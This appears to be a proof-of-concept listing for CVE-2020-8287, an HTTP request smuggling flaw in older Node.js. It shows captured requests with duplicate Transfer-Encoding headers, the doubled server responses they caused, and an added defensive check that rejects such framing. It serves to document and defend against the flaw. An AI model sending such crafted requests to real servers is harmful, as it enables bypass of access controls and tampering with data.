
CVE-2020-8287 PoC — Node.js environment issue vulnerability

Source
Associated Vulnerability
Title: Node.js environment issue vulnerability (CVE-2020-8287)
Description: Node.js is a JavaScript runtime built on the Chrome V8 engine; by wrapping V8 and using an event-driven, non-blocking I/O model, it makes it possible to write high-performance back-end applications in JavaScript. Node.js contains an environment issue vulnerability: an attacker can exploit it through HTTP Request Smuggling to bypass access restrictions and read or modify data. The following products and versions are affected: versions before 10.23.1, 12.20.1, 14.15.4 and 15.5.1.
Description
PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)
Readme
# nodejs-http-transfer-encoding-smuggling-poc

PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)

## `src/index.js`

```js
{
  header: [
    'Host',
    '127.0.0.1',
    'Transfer-Encoding',
    'chunked',
    'Transfer-Encoding',
    'eee'
  ],
  body: 'A'
}
{ header: [ 'Host', '127.0.0.1' ], body: '' }
{
  data: 'HTTP/1.1 200 OK\r\n' +
    'Date: Tue, 05 Jan 2021 09:55:33 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n' +
    'HTTP/1.1 200 OK\r\n' +
    'Date: Tue, 05 Jan 2021 09:55:33 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n'
}
```

## `src/express.js`

```js
{
  header: { host: '127.0.0.1', 'transfer-encoding': 'chunked, eee' },
  body: 'A'
}
{ header: { host: '127.0.0.1' }, body: '' }
{
  data: 'HTTP/1.1 200 OK\r\n' +
    'X-Powered-By: Express\r\n' +
    'Date: Tue, 05 Jan 2021 09:56:19 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n' +
    'HTTP/1.1 200 OK\r\n' +
    'X-Powered-By: Express\r\n' +
    'Date: Tue, 05 Jan 2021 09:56:19 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n'
}
```
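The dumps above show Node.js accepting one request carrying two Transfer-Encoding headers (`chunked` and the unknown coding `eee`) and then treating the leftover bytes as a second request. As an added example that is not part of the PoC repository, the check below applies the RFC 7230 framing rules that the fixed Node.js releases enforce: chunked must appear once and last, unknown codings are refused, and Transfer-Encoding alongside Content-Length is refused. `checkFraming`, `KNOWN_CODINGS` and the sample header array are assumptions of this example; the input mirrors the PoC's first request in the flat `rawHeaders` shape Node reports.

```javascript
// Added example (not from the PoC repository): a defensive check that a
// request's body framing is unambiguous, applying the RFC 7230 rules that
// Node.js 10.23.1 / 12.20.1 / 14.15.4 / 15.5.1 tightened. The header list
// is in Node's rawHeaders shape: [name, value, name, value, ...].

// Transfer codings a front end is willing to recognise (assumed list).
const KNOWN_CODINGS = new Set([
  'chunked', 'gzip', 'x-gzip', 'deflate', 'compress', 'x-compress', 'identity',
]);

// Fold every Transfer-Encoding header line into one lowercase coding list,
// the same way Node combined the PoC's two headers into 'chunked, eee'.
function parseTransferEncoding(values) {
  return values
    .flatMap((v) => v.split(','))
    .map((c) => c.trim().toLowerCase())
    .filter((c) => c.length > 0);
}

// Returns { ok: true } when the framing is unambiguous, otherwise
// { ok: false, reason } so the caller can answer 400 and close the socket.
function checkFraming(rawHeaders) {
  const te = [];
  let hasContentLength = false;
  for (let i = 0; i < rawHeaders.length; i += 2) {
    const name = rawHeaders[i].toLowerCase();
    if (name === 'transfer-encoding') te.push(rawHeaders[i + 1]);
    if (name === 'content-length') hasContentLength = true;
  }
  if (te.length === 0) return { ok: true }; // Content-Length or no body
  if (hasContentLength) {
    return { ok: false, reason: 'Transfer-Encoding and Content-Length both present' };
  }
  const codings = parseTransferEncoding(te);
  const unknown = codings.filter((c) => !KNOWN_CODINGS.has(c));
  if (unknown.length > 0) {
    return { ok: false, reason: `unknown transfer coding: ${unknown.join(', ')}` };
  }
  // chunked must be applied exactly once and as the final coding.
  if (codings.indexOf('chunked') !== codings.length - 1) {
    return { ok: false, reason: 'chunked must be the single, final transfer coding' };
  }
  return { ok: true };
}

// Constructed input mirroring the PoC's first request as Node reported it.
const SMUGGLED_REQUEST = [
  'Host', '127.0.0.1', 'Transfer-Encoding', 'chunked', 'Transfer-Encoding', 'eee',
];
console.log(checkFraming(SMUGGLED_REQUEST)); // → { ok: false, reason: 'unknown transfer coding: eee' }
```

The same check rejects the Express form `'chunked, eee'`, since both header layouts fold to the same coding list.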
File Snapshot

[4.0K] /data/pocs/55e944e305a84d8c2fa9f73fa3ce7aa152001c0a
├── [ 112] docker-compose.yaml
├── [ 204] Dockerfile
├── [ 699] package.json
├── [ 31K] package-lock.json
├── [1.3K] README.md
└── [4.0K] src
    ├── [ 810] express.js
    └── [ 809] index.js

1 directory, 7 files